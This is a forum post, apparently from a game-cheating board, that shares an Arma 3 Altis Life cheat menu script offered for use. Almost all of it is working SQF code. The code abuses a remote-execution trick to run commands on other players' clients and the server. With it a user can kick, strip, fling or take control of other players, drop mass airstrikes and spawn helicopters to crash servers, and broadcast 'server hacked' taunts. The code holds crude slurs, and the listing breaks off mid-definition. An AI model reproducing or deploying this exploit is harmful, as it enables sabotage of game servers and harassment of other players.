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  1. #1
    MiriwethV2's Avatar
    Join Date
    Aug 2014
    My Mood

    Simple Scrollmenü

    I created it long time ago.
    Have fun

    life_illegal_item_cleared = [];
    life_illegalweapons = [];
    life_illegal_items = [];
    setDate [2012, 9, 1, 13, 0];
    pnc = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 60) then {_l23 = name cursorTarget;_l24 = format["if(name player=='%1')then{vehicle player setVelocity [0,0,200];};", _l23];[_l24] call DurkSintax_Pro_RE;hint format["Fly %1", _l23];cutText[format["Fly %1", _l23], "PLAIN DOWN"];} }];
    pnc2 = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 61) then {_gte = name cursorTarget;gten = format[ "if (name player == '%1') then { removeAllWeapons player;removeAllWeapons player;removeuniform player;removevest player;removeAllItems player;removeBackpack player;}; ", _gte]; [gten] call DurkSintax_Pro_RE;} }];
    pnc3 = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 59) then { _gte = name cursorTarget; gten = format[ " if (name player == '%1') then {     vehicle player setFuel 0;   }; ", _gte];  [gten] call DurkSintax_Pro_RE;  Hint format ["%1 Vehicle Stoped!", _gte];}}];
    pnc5 = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 62) then {openMap[true,false];onMapSingleClick"[_pos select 0,_pos select 1,_pos select 2]call IrEcOCMmeNEnd_so_fly";}}];
    pnc5 = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 62) then {openMap[true,false];onMapSingleClick"[_pos select 0,_pos select 1,_pos select 2]call IrEcOCMmeNEnd_so_fly";}}];
    pnc4 = (findDisplay 46) displayAddEventHandler["KeyDown", { if ((_this select 1) == 68) then {player switchCamera "Internal";selectPlayer player;player remoteControl player;}}];
    player addEventHandler["Respawn",{player removeaction doshtact; doshtact=player addAction ["<t color='#3ADF00'>Laden</t>",{_nul=[]; []spawn NxIrecommendMain;}];}];
    DurkSintax_Pro_RE={M_R_IRecommend='C_man_1'createUnit[[0,0,0],(createGroup west),(_this select 0),1.0,"MAJOR"];};
    //onMapSingleClick "vehicle player setPos _pos";
    _gapinganusIrecommend = player;
    _gapinganusIrecommend enableFatigue false;
    life_thirst = 50000;
    life_hunger = 50000;
    life_carryWeight = -50000;
    removeallactions player;
    cutText["    \nNXIrecommendPrivat wird geladen....","PLAIN"];
    cutText["    \nOK!....","PLAIN"];
    removeallactions player;
    player removeaction Banner;
    Banner= player addAction ["<t color='#FF0000'>NXIrecommendPrivat </t>", "removeallactions player"];
    player removeaction Banner2;
    Banner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction Menue_Main;
    Menue_Main= player addAction ["<t color='#3ADF00'>Main Menue</t>","[]spawn MainMenue"];
    player removeaction Menue_Altis;
    Menue_Altis= player addAction ["<t color='#00FFFF'>Altis Menue</t>","[]spawn AltisMenue"]; 
    player removeaction Menue_Troll;
    Menue_Troll= player addAction ["<t color='#DF01D7'>Troll Menue</t>","[]spawn TrollMenue"];
    player removeaction Menue_Spawn;
    Menue_Spawn= player addAction ["<t color='#FF8000'>Spawn Menue</t>","[]spawn SpawnMenue"];
    player removeaction TargetAllMenueLoad;
    TargetAllMenueLoad= player addAction ["<t color='#00FF00'>Server Menue</t>", "[]spawn TargetAllMenue"];
    NxIrecommendMain = {removeallactions player;
    player removeaction Banner;
    Banner= player addAction ["<t color='#FF0000'>NXIrecommendPrivat </t>", "removeallactions player"];
    player removeaction Banner2;
    Banner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction Menue_Main;
    Menue_Main= player addAction ["<t color='#3ADF00'>Main Menue</t>","[]spawn MainMenue"];
    player removeaction Menue_Altis;
    Menue_Altis= player addAction ["<t color='#00FFFF'>Altis Menue</t>","[]spawn AltisMenue"]; 
    player removeaction Menue_Troll;
    Menue_Troll= player addAction ["<t color='#DF01D7'>Troll Menue</t>","[]spawn TrollMenue"];
    player removeaction Menue_Spawn		;
    Menue_Spawn= player addAction ["<t color='#FF8000'>Spawn Menue</t>","[]spawn SpawnMenue"];
    player removeaction TargetAllMenueLoad;
    TargetAllMenueLoad= player addAction ["<t color='#00FF00'>Server Menue</t>", "[]spawn TargetAllMenue"];
    TrollMenue = {removeallactions player;
    player removeaction closetroll;
    closetroll= player addAction ["<t color='#FF0000'>Close</t>","[]spawn NxIrecommendMain"];
    player removeaction TrollBanner2;
    TrollBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction afaffads;
    afaffads= player addAction ["<t color='#7F25E0'>===MISC===</t>", ""];
    player removeaction delete;
    delete= player addAction ["Delete",{deleteVehicle cursorTarget;cutText[format["%1 DELETED",cursorTarget],"PLAIN DOWN"];}];
    player removeaction TskServer;
    TskServer= player addAction ["Task Server",{closedialog 0;[{[] spawn {["TaskCreated", ["", "Such den Hacker!"]] call BIS_fnc_showNotification;sleep 50;["TaskFailed", ["", "YOU JUST GOT ANAL FUCKED"]] call BIS_fnc_showNotification;};}, "BIS_fnc_SPAWN", true, false] call BIS_fnc_MP;hint "Fertig";}];
    player addAction ["Broadcast", {  	_share = "	hint 'Hallo wie geht es euch? Achja Server wurde gehackt  und ich liebe euch sehr doll ==D';	";	[_share] call DurkSintax_Pro_RE;}];
    player removeaction Question;
    Question= player addAction ["Question",{closedialog 0;_FUCK = format["['Hallo, Dieser Server wurde mit dem NxIrecommend Privat Menü 2.0 Gehackt. Für Fragen bezüglich des Menüs biete ich (MrIrecommend) mich auf folgenden Teamspeak an ---'] spawn BIS_fnc_guiMessage", "NONE"];[_FUCK] call DurkSintax_Pro_RE;}];
    player removeaction EDDText;
    EDDText= player addAction ["3D Text",{closedialog 0;if (isNil "IRREEECOMMMMMANNNNNDDD_atext") then {IRREEECOMMMMMANNNNNDDD_atext = 0;};if (IRREEECOMMMMMANNNNNDDD_atext == 0) then {IRREEECOMMMMMANNNNNDDD_atext = 1;hint "3D Text ON";_3d = "[] spawn{disableSerialization;if (isNil ""BIS_fnc_3dCredits_n"") then {BIS_fnc_3dCredits_n = 2733;};BIS_fnc_3dCredits_n cutRsc [""rscDynamicText"", ""PLAIN""];BIS_fnc_3dCredits_n = BIS_fnc_3dCredits_n + 1;_ctrl = ((uiNamespace getvariable ""BIS_dynamicText"") displayctrl 9999);_ctrl ctrlShow true; _ctrl ctrlEnable true; _ctrl ctrlSetFade 0;tdtext = true;while {tdtext} do{if !(tdtext) exitWith {};_pos = [(getPosATL player) select 0, (getPosATL player) select 1, ((getPosATL player) select 2) + 2];_pos2D = worldToScreen _pos;if (count _pos2D > 0) then{_ctrl ctrlSetPosition [(_pos2D select 0) - (safezoneW / 2), (_pos2D select 1), safezoneW, safezoneH];_text = parseText ""<t size='0.8' color='#FF1AAA'>Server geowned  =P</t>"";_ctrl ctrlSetStructuredText _text;_ctrl ctrlCommit 0;};};_ctrl ctrlShow false;_ctrl ctrlEnable false;};";[_3d] call DurkSintax_Pro_RE;} else {IRREEECOMMMMMANNNNNDDD_atext = 0;hint "3D Text OFF";_3d = "tdtext = false; tdtext = nil";[_3d] call DurkSintax_Pro_RE;};}];
    player removeaction dadadf;
    dadadf= player addAction ["<t color='#7F25E0'>===Server Explosionen Klein===</t>", ""];
    player addAction ["Bombe", {Missles = 1;missle1 = {openMap [false, false];[_pos] spawn {for '_i' from 0 to Missles do{_missle = "Bo_GBU12_LGB";_mpos = [_this select 0 select 0, _this select 0 select 1, (_this select 0 select 2) + 200];_launch = createVehicle [_missle, _mpos, [], 0, "CAN_COLLIDE"];_launch setvelocity [0,0,0];[_launch,-90,0] call BIS_fnc_setPitchBank;hint format ["%1 Missiles Launched",_i];sleep (random 1.00);};};};titleText ["Click on map drop missle's","PLAIN"]; titlefadeout 7;onMapSingleClick "_pos call missle1;";openMap [true, false];}];
    player addAction ["Bombe (10X)", {Missles = 10;missle1 = {openMap [false, false];[_pos] spawn {for '_i' from 0 to Missles do{_missle = "Bo_GBU12_LGB";_mpos = [_this select 0 select 0, _this select 0 select 1, (_this select 0 select 2) + 200];_launch = createVehicle [_missle, _mpos, [], 0, "CAN_COLLIDE"];_launch setvelocity [0,0,0];[_launch,-90,0] call BIS_fnc_setPitchBank;hint format ["%1 Missiles Launched",_i];sleep (random 1.00);};};};titleText ["Click on map drop missle's","PLAIN"]; titlefadeout 7;onMapSingleClick "_pos call missle1;";openMap [true, false];}];
    player addAction ["Airstrike", {Missles = 1;missle1 = {openMap [false, false];[_pos] spawn {for '_i' from 0 to Missles do{_missle = "M_AT";_mpos = [_this select 0 select 0, _this select 0 select 1, (_this select 0 select 2) + 200];_launch = createVehicle [_missle, _mpos, [], 0, "CAN_COLLIDE"];_launch setvelocity [0,0,0];[_launch,-90,0] call BIS_fnc_setPitchBank;hint format ["%1 Missiles Launched",_i];sleep (random 1.00);};};};titleText ["Click on map drop missle's","PLAIN"]; titlefadeout 7;onMapSingleClick "_pos call missle1;";openMap [true, false];}];
    player addAction ["Airstrike(10X)", {Missles = 10;missle1 = {openMap [false, false];[_pos] spawn {for '_i' from 0 to Missles do{_missle = "M_AT";_mpos = [_this select 0 select 0, _this select 0 select 1, (_this select 0 select 2) + 200];_launch = createVehicle [_missle, _mpos, [], 0, "CAN_COLLIDE"];_launch setvelocity [0,0,0];[_launch,-90,0] call BIS_fnc_setPitchBank;hint format ["%1 Missiles Launched",_i];sleep (random 1.00);};};};titleText ["Click on map drop missle's","PLAIN"]; titlefadeout 7;onMapSingleClick "_pos call missle1;";openMap [true, false];}];
    player addAction ["Kleiner Blitz", {private ["_caller"];
        _caller = _this select 0;
        omsz = false;
        titleText ["Map..", "PLAIN"];
        ["mk_zeuslb", "onMapSingleClick", {
                titleText ["", "PLAIN"];
                _center = createCenter sideLogic;    
                _group = createGroup _center;  
                _target = getPos (nearestObject _pos);
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                sleep 1;
                "Bo_GBU12_LGB" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 0+ 0];
                ["mk_zeuslb", "onMapSingleClick"] call BIS_fnc_removeStackedEventHandler;
                omscz = true;
                openMap [false, false];
        }] call BIS_fnc_addStackedEventHandler;;}];
    player removeaction dadaadf;
    dadaadf= player addAction ["<t color='#7F25E0'>===Server Explosionen Mega===</t>", ""];
    player addAction ["Airstrike (1000 Rakten)", {meins=1000;mein1={openMap[false,false];[_pos]spawn{for'_l39'from 0 to meins do{_l87="M_AT";_l88=[_this select 0 select 0,_this select 0 select 1,(_this select 0 select 2)+200];_l89=createVehicle[_l87,_l88,[],0,"CAN_COLLIDE"];_l89 setvelocity[random 1000.00 - 500,random 1000.00 - 500,0];[_l89,-90,0]call BIS_fnc_setPitchBank;hint format["%1 Missiles Launched - ",_l39];sleep(random 0.00001);};};};titleText["Click on map to drop Airstrike","PLAIN"];titlefadeout 7;onMapSingleClick"_pos call mein1;";openMap[true,false];}];
    player addAction ["Jet Kill", {if (isnil "GAYcow" ) then {GAYcow=0};
    if (GAYcow==0) then
     player addweapon "ItemGPS";
    closedialog 0;
    sleep 0.5;
    TitleText [format["Click on the map"], "PLAIN DOWN"];
    openMap [true, false];
    GayPASS = 'hint "Airstrike ";';
    GayPASS = GayPASS + ' _pos = [(cTargetPos select 0) + random 100, (cTargetPos select 1) + random 100, 100];';
    GayPASS = GayPASS + ' PLANE1 = createVehicle ["I_Plane_Fighter_03_CAS_F", [(_pos) select 0,(_pos) select 1,500], [], 0, "FLY"];';
    GayPASS = GayPASS + 'cpbLoops = 100;';
    GayPASS = GayPASS + 'cpLoopsDelay = 0.0001;';
    GayPASS = GayPASS + 'for "_i" from 0 to cpbLoops do {';
    GayPASS = GayPASS + ' _pos1 = [(cTargetPos select 0)+random 300, (cTargetPos select 1)+random 300];';
    //GayPASS = GayPASS + ' _chute= createvehicle ["B_Parachute_02_F", [(_pos1) select 0,(_pos1) select 1], [], 0, "FLY"];';
    //GayPASS = GayPASS + ' _heli= createvehicle ["B_Heli_Light_01_armed_F", [(_pos1) select 0,(_pos1) select 1,152], [], 0, "FORM"];';
    GayPASS = GayPASS + ' _chute= createvehicle ["", [(_pos1) select 0,(_pos1) select 1], [], 0, ""];';
    GayPASS = GayPASS + ' _heli= createvehicle ["I_Plane_Fighter_03_CAS_F", [(_pos1) select 0,(_pos1) select 1,152], [], 0, "FORM"];';
    GayPASS = GayPASS + ' _heli attachTo [ _chute, [0,0,0]];' ;
    GayPASS = GayPASS + 'sleep cpLoopsDelay;};';
    GayPASS = GayPASS + 'cTargetPos = nil;cpbLoops = nil;cpLoopsDelay = nil;';
    onMapSingleClick "cTargetPos = _pos;[] spawn compile GayPASS; onMapSingleClick '';true;";;}];
    player addAction ["Mega Blitz", {private ["_caller"];
        _caller = _this select 0;
        omsz = false;
        titleText ["Map Bitch.", "PLAIN"];
        ["mk_zeuslb", "onMapSingleClick", {
                _center = createCenter sideLogic;    
                _group = createGroup _center;  
                _target = getPos (nearestObject _pos);
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                _zlb = _group createUnit ["ModuleLightning_F",_target,[],0,""];
                sleep 1;
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 0+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 5+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 10+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 15+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 20+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 25+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 30+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 35+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 40+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 45+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 50+ 0];
                "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 55+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 60+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 65+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 75+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 80+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 85+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 90+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 100+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 110+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 120+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 130+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 140+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 150+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 160+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 170+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 180+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 190+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 200+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 210+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 220+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 230+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 240+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 250+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 260+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 270+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 280+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 290+ 0];
            "HelicopterExploSmall" createvehiclelocal [(_pos select 0)  , (_pos select 1) , 300+ 0];
                ["mk_zeuslb", "onMapSingleClick"] call BIS_fnc_removeStackedEventHandler;
                omscz = true;
                openMap [false, false];
        }] call BIS_fnc_addStackedEventHandler;}];
    player addAction ["Server Kill (20 Helis all)", {c = 20;While { c > 1 } do {	{"O_Heli_Attack_02_black_F" createVehicle position _x;} foreach playableUnits;	c = c - 1;	hint format ["%1",c];};;}];
    MainMenue = {removeallactions player;player removeaction CloseMain;
    CloseMain= player addAction ["<t color='#FF0000'>Close</t>","[]spawn NxIrecommendMain"];
    player removeaction Menue_Target;
    Menue_Target= player addAction ["<t color='#70E834'>Target Menue</t>","[]spawn TargetMenue"];
    player removeaction MainBanner2;
    MainBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction playerrrr;
    playerrrr= player addAction ["<t color='#7F25E0'>===Player===</t>", ""];
    player removeaction moveInDriverrr;
    moveInDriverrr= player addAction ["Drive Target vehicle","vehicle player moveInDriver cursorTarget"];
    player removeaction dUAMMO;
    dUAMMO= player addAction ["Leave vehicle", "moveOut driver vehicle player"];
    player removeaction UAMMO;
    UAMMO= player addAction ["Unlimited Ammo","[]spawn U_N_L_I_ME"];
    player removeaction gmdeoff;
    gmdeoff= player addAction ["GodMode [ON/OFF]", "[]spawn IrEcOCMmeNEnd_God_MODE;"];
    player removeaction cargod;
    cargod= player addAction ["Cargod [ON/OFF]",{if(isnil"DarkNurdSupremeIre_Car_God")then{DarkNurdSupremeIre_Car_God=0};if(DarkNurdSupremeIre_Car_God==0)then{cutText[format["CarGodmode ON"],"PLAIN DOWN"];hint format["CarGodmode ON"];DarkNurdSupremeIre_Car_God=1;DarkNurdSupremeIre_Car_God_lol=true;while{DarkNurdSupremeIre_Car_God_lol}do{if((vehicle player isKindOf"LandVehicle")||(vehicle player isKindOf"Air")||(vehicle player isKindOf"Ship"))then{if((fuel(vehicle player))<0.9)then{vehicle player setFuel 1;};if((damage(vehicle player))!=0)then{vehicle player setdammage 0;};};sleep 0.01;};}else{cutText[format["CarGodmode OFF"],"PLAIN DOWN"];hint format["CarGodmode OFF"];DarkNurdSupremeIre_Car_God_lol=false;DarkNurdSupremeIre_Car_God=0;};}];
    player removeaction invisibllle;
    invisibllle= player addAction ["Invisiblity", "[]spawn INukeReaper_Invisable"];
    player removeaction OnOcLippPp;
    OnOcLippPp= player addAction ["No Clip",{if (isNil "IrEcCpLpkEmENd_Noclip") then {IrEcCpLpkEmENd_Noclip = 0;};if (IrEcCpLpkEmENd_Noclip == 0) then {IrEcCpLpkEmENd_Noclip = 1;hint "No Clip ON";} else {IrEcCpLpkEmENd_Noclip = 0;hint "No Clip OFF";};while {IrEcCpLpkEmENd_Noclip == 1}do {_clipList = [];_objects = ((position player) nearObjects 100); {if !(_x in _clipList) then {_clipList = _clipList + [_x];player disableCollisionWith _x;};}forEach _objects; {if !(_x in _objects) then {_clipList = _clipList - [_x];player enableCollisionWith _x;};}forEach _clipList;sleep 5;}; {player enableCollisionWith _x;}forEach _clipList;}];
    player removeaction e777p;
    e777p= player addAction ["E5P Markers", {                if (isnil("E7P")) then {                    E7P = 0;                };                if (E7P == 0) then {                    E7P = 1;                    hint "E7P ON ";                } else {                    E7P = 0;                    hint "E7P OFF ";                };                if (E7P == 1) then {                    onEachFrame {                        _l49 = nearestobjects[player, ["CAManBase"], 1400]; {                            if ((side _x != side player) && (getPlayerUID _x != "") && ((player distance _x) < 1400)) then {                                drawIcon3D["", [1, 0, 0, 1], [visiblePosition _x select 0, visiblePosition _x select 1, (getPosATL _x select 2) + 2], 0.1, 0.1, 45, (format["%2 : %1m", round(player distance _x), name _x]), 1, 0.04, "TahomaB"]                            } else {                                if ((getPlayerUID _x != "") && ((player distance _x) < 1000)) then {                                    drawIcon3D["", [0, 0.5, 1, 1], [visiblePosition _x select 0, visiblePosition _x select 1, (getPosATL _x select 2) + 2], 0.1, 0.1, 45, (format["%2 : %1m", round(player distance _x), name _x]), 1, 0.04, "TahomaB"]                                };                            };                        }                        foreach playableUnits;                    };                } else {                    onEachFrame {                        nil                    };                };            }];
    player removeaction MapM;
    MapM= player addAction ["Map Markers",{                St12rxick_Noobs = [];                St12rxick_Bitches = [];                if (isnil "St12rxick_Map_Markers") then {                    St12rxick_Map_Markers = 0;                };                if (St12rxick_Map_Markers == 0) then {                    St12rxick_Map_Markers = 1;                    hint "Player Markers  ON";                } else {                    St12rxick_Map_Markers = 0;                    hint "Player Markers  OFF";                };                while {                    St12rxick_Map_Markers == 1                }                do {                    {                        if ((vehicle _x isKindOf "LandVehicle") || (vehicle _x isKindOf "Air") || (vehicle _x isKindOf "Ship")) then {                            if (count(crew vehicle _x) > 0) then {                                {                                    if (!(_x in St12rxick_Noobs) and(alive _x) and(getPlayerUID _x != "")) then {                                        private["_pos", "_l44", "_l45"];                                        _l45 = vehicle _x;                                        _pos = visiblePosition _x;                                        _l44 = createMarkerLocal[format["CRW%1%2", _pos select 0, _pos select 1], [(_pos select 0) + 00, _pos select 1, 0]];                                        _l8 = (gettext(configFile >> 'CfgVehicles' >> (typeof vehicle _x) >> 'displayName'));                                        _l44 setMarkerTextLocal format['%1---%2---%3m', name _x, _l8, round(_x distance player)];                                        _l44 setMarkerTypeLocal "mil_dot";                                        if ((side _x == side player) and(side _x != resistance)) then {                                            _l44 setMarkerColorLocal "ColorBlue";                                        } else {                                            _l44 setMarkerColorLocal "ColorRed";                                        };                                        _l44 setMarkerSizeLocal[1, 1];                                        St12rxick_Noobs set[count St12rxick_Noobs, _x];                                        [_x, _l44, _l45] spawn {                                            private["_l46", "_l47", "_l48"];                                            _l46 = _this select 0;                                            _l47 = _this select 1;                                            while {                                                (St12rxick_Map_Markers == 1) and(alive _l46) and(vehicle _l46 != _l46) and(getPlayerUID _l46 != "")                                            }                                            do {                                                _l48 = ((crew vehicle _l46) find _l46);                                                _l47 setMarkerPosLocal([(visiblePosition _l46 select 0) + 00, (visiblePosition _l46 select 1) - (25 + _l48 * 20), 0]);                                                sleep 0.01;                                            };                                            deleteMarkerLocal _l47;                                            if (_l46 in St12rxick_Noobs) then {                                                St12rxick_Noobs set[(St12rxick_Noobs find _l46), -1];                                                St12rxick_Noobs = St12rxick_Noobs - [-1];                                            };                                            true;                                        };                                    };                                }                                forEach crew vehicle _x;                            };                        } else {                            if (!(_x in St12rxick_Bitches) and(vehicle _x == _x) and(getPlayerUID _x != "")) then {                                private["_pos", "_l44"];                                _pos = visiblePosition _x;                                _l44 = createMarkerLocal[format["PLR%1%2", _pos select 0, _pos select 1], [(_pos select 0) + 00, _pos select 1, 0]];                                _l44 setMarkerTypeLocal "mil_dot";                                _l44 setMarkerSizeLocal[1, 1];                                if ((side _x == side player) and (side _x != resistance)) then {                                    _l44 setMarkerColorLocal "ColorWhite";                                } else {                                    _l44 setMarkerColorLocal "ColorRed";                                };                                _l44 setMarkerTextLocal format["%1---%2", name _x, round(_x distance player)];                                if (_x == player) then {                                    _l44 setMarkerColorLocal "ColorGreen";                                };                                St12rxick_Bitches set[count St12rxick_Bitches, _x];                                [_x, _l44] spawn {                                    private["_l46", "_l47"];                                    _l46 = _this select 0;                                    _l47 = _this select 1;                                    while {                                        (St12rxick_Map_Markers == 1) and(alive _l46) and(vehicle _l46 == _l46) and(getPlayerUID _l46 != "")                                    }                                    do {                                        _l47 setMarkerPosLocal([visiblePosition _l46 select 0, visiblePosition _l46 select 1, 0]);                                        sleep 0.01;                                    };                                    deleteMarkerLocal _l47;                                    if (_l46 in St12rxick_Bitches) then {                                        St12rxick_Bitches set[(St12rxick_Bitches find _l46), -1];                                        St12rxick_Bitches = St12rxick_Bitches - [-1];                                    };                                    true;                                };                            };                        };                    }                    forEach playableUnits;                    sleep 0.3;                }; {                    _l44 = str _x;                    deleteMarkerLocal _l44;                }                forEach playableUnits;            }];
    TargetMenue = {
    removeallactions player;
    player removeaction CloseTarget;
    CloseTarget= player addAction ["<t color='#FF0000'>Close</t>","[]spawn NxIrecommendMain"];
    player removeaction TargetBanner2;
    TargetBanner2= player addAction ["<t color='#000000'>----------------------</t>", ""];
    player removeaction tarrrget;
    tarrrget= player addAction ["<t color='#7F25E0'>===Target===</t>", ""];
    player removeaction revivet;
    revivet= player addAction ["Revive Target",{[[name player],"life_fnc_revived",cursorTarget,FALSE] spawn life_fnc_MP;}];
    player removeaction dstrytgt;
    dstrytgt= player addAction ["DestroyTarget","cursorTarget setDamage 100"];
    player addAction ["Granate Target",{  geordie = cursorTarget;posbam = getPos geordie;"GrenadeHand" createvehiclelocal posbam;sleep 1;}];
    player removeaction Spectate;
    Spectate= player addAction ["Spectate",{_l23 = name cursorTarget; {if (name _x == _l23) then {_x switchCamera "EXTERNAL";hint format["Spectating %1,press F10 to cancel", name _x];};}
    forEach entities "CAManBase";
    (findDisplay 46) displayAddEventHandler['KeyDown', 'if((_this select 1)==0x44)then{player switchCamera"EXTERNAL";}'];
    player addAction ["EMP Target", {  _gte = name cursorTarget; gten = format[ " if (name player == '%1') then {     vehicle player setFuel 0;   }; ", _gte];  [gten] call DurkSintax_Pro_RE;  Hint format ["%1 Vehicle Stoped!", _gte];}];
    player removeaction Heal_T;
    Heal_T= player addAction ["Heal","[]spawn ILuisReaper_heal_t"];
    player removeaction fly_T;
    fly_T= player addAction ["Fly",{_l23 = name cursorTarget;_l24 = format["if(name player=='%1')then{vehicle player setVelocity [0,0,100];};", _l23];[_l24] call DurkSintax_Pro_RE;hint format["Fly %1", _l23];cutText[format["Fly %1", _l23], "PLAIN DOWN"];}];
    player removeaction JoinVt;
    JoinVt= player addAction ["Join Vehicle", {_l23 = name cursorTarget; {if (name _x == _l23) then {player moveInCargo vehicle _x;player moveInGunner vehicle _x;hint format["%1 vehicle joined", _x];cutText[format["%1 vehicle joined", _x], "PLAIN DOWN"];};}forEach entities "AllVehicles";}];
    player removeaction Inviss_T;
    Inviss_T= player addAction ["Invisibility",{_l23 = name cursorTarget;if (isNil "IrecommandDV2_initarr2") then {IrecommandDV2_initarr2 = true;IrecommandDV2_inamearr2 = [];};if !(_l23 in IrecommandDV2_inamearr2) then {hint format["Invisibility on %1 Activated", _l23];IrecommandDV2_inamearr2 = IrecommandDV2_inamearr2 + [_l23];} else {hint format["Invisibility on %1 Deactivated", _l23];IrecommandDV2_inamearr2 = JJJJ_MMMM___EEEEEEE_inamearr2 - [_l23];};_tinv = format["if (isServer) then{{if ((name _x == '%1') && (name _x in %2)) exitWith{[nil, vehicle _x, 'per', rHIDEOBJECT, true] call RE;};if ((name _x == '%1') && !(name _x in %2)) exitWith{[nil, vehicle _x, 'per', rHIDEOBJECT, false] call RE;};} forEach playableUnits;};", _l23, IrecommandDV2_inamearr2];[_tinv] call DurkSintax_Pro_RE;}];
    player removeaction loudout_T;
    loudout_T= player addAction ["Loadout","[]spawn WasdFasd_Target_Loadout"];
    player removeaction SteleUp_TTt;
    SteleUp_TTt= player addAction ["Delete Clothing Target", {_gte = name cursorTarget;gten = format[ "if (name player == '%1') then { removeAllWeapons player;removeAllWeapons player;removeuniform player;removevest player;removeAllItems player;removeBackpack player;}; ", _gte]; [gten] call DurkSintax_Pro_RE;}];
    player removeaction FuckUp_TTt;
    FuckUp_TTt= player addAction ["FuckUp","[]spawn MoIOoOonster_FuckUp_t"];
    player removeaction Kick_T;
    Kick_T= player addAction ["Kick",{target = name cursorTarget;kikk = format["if(name player == '%1') then {failMission'LOSER';0 fadeSound 0;for'_l39'from 0 to 100 do{(findDisplay _l39)closeDisplay 0;};};", target];[kikk] call DurkSintax_Pro_RE;hint "This Player has been kicked ";}];
    player removeaction Control_T;
    Control_T= player addAction ["Control Target",{cursorTarget switchCamera "Internal";selectPlayer cursorTarget;player remoteControl cursorTarget;hint "Press F10 to switch back!"}];
    player removeaction spyglassaSsSfake;
    spyglassaSsSfake= player addAction ["Fake spyglass", "[]spawn SpyglassFakeTrigger"];
    TargetAllMenue = {removeallactions player;player removeaction TargetAll;
